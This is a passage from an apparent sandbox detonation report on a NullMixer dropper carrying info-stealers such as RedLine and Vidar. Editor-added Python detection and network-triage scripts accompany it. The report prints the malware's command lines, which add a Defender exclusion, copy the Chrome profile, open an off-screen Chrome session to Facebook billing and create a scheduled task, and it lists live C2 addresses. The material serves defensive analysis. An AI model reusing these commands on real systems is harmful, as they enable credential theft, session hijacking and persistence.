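line, are the other two hosts-side tells. The following detection logic is an added example by the editor, not sandbox output: it runs the rules over process-creation events constructed from the command lines in the list (PIDs, parent links and the one benign cmd.exe control are assumptions) and then correlates the kill, copy and hidden-launch steps under a common ancestor.

```python
"""Detections for the process chain above: an added example, not sandbox output."""
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int       # PIDs and parent links are constructed; the report omits them
    ppid: int
    image: str
    cmdline: str

# Constructed sample built from command lines in the Processes list, plus
# one benign cmd.exe as a control. Parent 1 is a placeholder.
EVENTS = [
    ProcEvent(100, 1, r"C:\Users\Admin\AppData\Local\Temp\setup.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\setup.exe"'),
    ProcEvent(101, 100, r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c taskkill /f /im chrome.exe"),
    ProcEvent(102, 101, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im chrome.exe"),
    ProcEvent(103, 100, r"C:\Windows\SysWOW64\xcopy.exe",
              r'xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" '
              r'"C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y'),
    ProcEvent(104, 100, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
              r'--window-position=-50000,-50000 '
              r'--user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" '
              r'https://secure.facebook.com/ads/manager/account_settings/account_billing/'),
    ProcEvent(105, 1, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"'),
    ProcEvent(106, 100, r"C:\Windows\winnetdriv.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732550209 0'),
    ProcEvent(107, 1, r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c dir"),
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)

def _norm(path):
    # WOW64 redirection makes a SysWOW64 image carry a System32 command line;
    # fold the two before comparing so that alone is not a mismatch.
    return path.lower().replace("\\syswow64\\", "\\system32\\")

def rule_defender_exclusion(ev):
    """PowerShell excluding a user-writable path from Defender."""
    return (ev.image.lower().endswith("powershell.exe")
            and "Add-MpPreference" in ev.cmdline
            and re.search(r"-Exclusion(Path|Process)", ev.cmdline, re.I) is not None
            and USER_WRITABLE.search(ev.cmdline) is not None)

def rule_chrome_profile_copy(ev):
    """Bulk copy of the Chrome profile (cookies, Login Data, session state)."""
    return (ev.image.lower().endswith(("xcopy.exe", "robocopy.exe"))
            and re.search(r"chrome\\user data", ev.cmdline, re.I) is not None)

def rule_hidden_chrome_session(ev):
    """Chrome opened off-screen on a profile under Temp with a target URL."""
    cl = ev.cmdline
    return (ev.image.lower().endswith("chrome.exe")
            and re.search(r"--window-position=-\d{4,},-\d{4,}", cl) is not None
            and re.search(r'--user-data-dir="?[^"\s]*\\Temp\\', cl, re.I) is not None
            and "https://" in cl)

def rule_browser_kill(ev):
    """taskkill against the browser, so its profile files are unlocked."""
    return (ev.image.lower().endswith("taskkill.exe")
            and re.search(r"/im\s+chrome\.exe", ev.cmdline, re.I) is not None)

def rule_image_cmdline_mismatch(ev):
    """Image path differs from the executable the command line names
    (the winnetdriv.exe entry): a copied and relaunched binary."""
    m = re.match(r'"([^"]+)"|(\S+)', ev.cmdline)
    if not m:
        return False
    named = m.group(1) or m.group(2)
    return ("\\" in named and named.lower().endswith(".exe")
            and _norm(named) != _norm(ev.image))

RULES = {
    "browser_kill": rule_browser_kill,
    "chrome_profile_copy": rule_chrome_profile_copy,
    "defender_exclusion_userpath": rule_defender_exclusion,
    "hidden_chrome_session": rule_hidden_chrome_session,
    "image_cmdline_mismatch": rule_image_cmdline_mismatch,
}

def detect(events):
    """Return (rule_name, pid) for every event a rule fires on."""
    return [(name, ev.pid) for ev in events for name, fn in RULES.items() if fn(ev)]

def _ancestor_past_cmd(ev, by_pid):
    # taskkill is wrapped in "cmd.exe /c", so climb through cmd.exe parents.
    while (parent := by_pid.get(ev.ppid)) is not None and parent.image.lower().endswith("cmd.exe"):
        ev = parent
    return ev.ppid

def session_hijack_chains(events):
    """PIDs under which kill + profile copy + hidden launch all occurred:
    the cookie-replay chain against Facebook that the report shows."""
    by_pid = {ev.pid: ev for ev in events}
    needed = {"browser_kill", "chrome_profile_copy", "hidden_chrome_session"}
    seen = defaultdict(set)
    for name, pid in detect(events):
        if name in needed:
            seen[_ancestor_past_cmd(by_pid[pid], by_pid)].add(name)
    return sorted(pid for pid, names in seen.items() if names >= needed)
```

Run on the sample, detect() fires once per malicious step and never on the control, and session_hijack_chains() returns the setup.exe PID because all three steps resolve to it once the cmd.exe wrapper around taskkill is skipped. The individual rules are deliberately weak on their own (taskkill of a browser, a copy under Temp); the correlation is what turns them into a confident verdict.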
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | znegs.xyz | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.27.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| N/A | 127.0.0.1:59219 | | tcp |
| N/A | 127.0.0.1:59221 | | tcp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| US | 8.8.8.8:53 | 239.2.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | secure.facebook.com | udp |
| GB | 157.240.214.13:443 | secure.facebook.com | tcp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| GB | 157.240.214.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 13.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 11.214.240.157.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| SG | 37.0.11.8:80 | | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
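Most of the Network table is noise: PTR lookups (in-addr.arpa) that the sandbox and Chrome issue for every address they touch, Facebook and fbcdn.net traffic from the hijacked browser session, c.pki.goog certificate fetches, and loopback chatter between dropped components. What is left separates into three groups a practitioner treats differently: public IP/geolocation services (ipinfo.io, api.db-ip.com, www.maxmind.com), which are fingerprinting and a weak signal on their own; legitimate services abused for hosting or beaconing (iplogger.org, cdn.discordapp.com, the tumblr.com subdomain); and connections to bare IPs with no DNS name, including the repeated TCP sessions to 45.142.213.135 on port 30058, which the report lists but does not attribute to any family. The script below is an added example by the editor, not part of the report: it parses rows in the table's own layout, including rows whose Domain cell is empty, and sorts them into those groups. The category lists are the editor's own assumptions, and the sample is a copied subset of the rows above.

```python
"""Triage of the sandbox Network table: an added example, not report output."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Subset of rows copied from the table above, in the layout the report
# prints them, including rows with an empty Domain cell.
SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | znegs.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| GB | 37.0.8.235:80 | | tcp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 127.0.0.1:59219 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp |
"""

PROTOS = {"tcp", "udp"}
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# Editor's category lists (assumptions, not from the report).
NOISE_SUFFIXES = (".in-addr.arpa", "facebook.com", "fbcdn.net", "pki.goog", "google.com")
GEOIP_SERVICES = {"ipinfo.io", "db-ip.com", "api.db-ip.com", "www.maxmind.com"}
HOSTING_SUFFIXES = ("iplogger.org", "discordapp.com", "tumblr.com")

@dataclass(frozen=True)
class NetRow:
    country: str
    host: str
    port: int
    domain: str
    proto: str

def parse_rows(text):
    """Parse the table; tolerate rows that omit the Domain cell."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) > 1 and cells[-1] == "" and cells[-2] in PROTOS:
            cells.pop()                      # "| CC | ip:port | tcp | |"
        if len(cells) == 3 and cells[2] in PROTOS:
            cells.insert(2, "")              # "| CC | ip:port | tcp |"
        if len(cells) != 4 or cells[3] not in PROTOS:
            continue                         # header or blank line
        country, dest, domain, proto = cells
        host, _, port = dest.rpartition(":")
        rows.append(NetRow(country, host, int(port), domain, proto))
    return rows

def classify_name(name):
    if not name or IPV4.fullmatch(name):
        return None                          # no DNS name: direct-to-IP
    if name.endswith(NOISE_SUFFIXES):
        return "noise"
    if name in GEOIP_SERVICES:
        return "geo_ip_lookup"
    if name.endswith(HOSTING_SUFFIXES):
        return "abused_hosting"
    return "unclassified_domain"

def triage(rows):
    """Group names by category and count connections to non-noise endpoints."""
    domains = defaultdict(set)
    connections, direct_ip, nonstandard_port = Counter(), Counter(), Counter()
    for r in rows:
        if r.host.startswith("127."):
            continue                         # loopback between dropped components
        cat = classify_name(r.domain)
        if cat and cat != "noise":
            domains[cat].add(r.domain)
        if (r.port == 53 and r.proto == "udp") or cat == "noise":
            continue                         # a DNS query is not a connection
        ep = f"{r.host}:{r.port}"
        connections[ep] += 1
        if cat is None:
            direct_ip[ep] += 1
        if r.port not in (80, 443):
            nonstandard_port[ep] += 1
    return {"domains": {k: sorted(v) for k, v in domains.items()},
            "connections": connections,
            "direct_ip": dict(direct_ip),
            "nonstandard_port": dict(nonstandard_port)}
```

On the sample, triage(parse_rows(SAMPLE_ROWS)) leaves znegs.xyz and wfsdragon.ru as unclassified domains worth pivoting on, puts iplogger.org and cdn.discordapp.com under abused hosting, and reports three bare-IP endpoints, of which only 45.142.213.135:30058 is on a non-standard port and is contacted repeatedly. DNS-only names (queried but never connected to within the run) are kept in the domain groups because the sandbox may simply have timed out before the connection; that is also why the full table's s.lletlee.com and live.goatgame.live lookups, which never resolve to a connection, still belong on the watch list.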
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 15:56
Reported
2024-11-25 15:59
Platform
win7-20241010-en
Max time kernel
42s
Max time network
151s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\438dc1669.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Looks up geolocation information via web service
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\bf2e8642ac5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\f65dc44f3b4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a6168f1f756.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\aae15d524bc2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9c7f6d97e7dc008682f6761744de856a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc385231.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f65dc44f3b4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 745d0d3ff9cc2c3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bf2e8642ac5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c b5203513d7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a6168f1f756.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\aae15d524bc2.exe
aae15d524bc2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 438dc1669.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\b5203513d7.exe
b5203513d7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
5f9a813bc385231.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\745d0d3ff9cc2c3.exe
745d0d3ff9cc2c3.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\f65dc44f3b4.exe
f65dc44f3b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\438dc1669.exe
438dc1669.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a070c3838.exe
a070c3838.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\bf2e8642ac5.exe
bf2e8642ac5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\a6168f1f756.exe
a6168f1f756.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc38523010.exe
5f9a813bc38523010.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6BBA96\5f9a813bc385231.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 432
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732550208 0
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS7DD7.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1864 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | znegs.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | db-ip.com | udp |
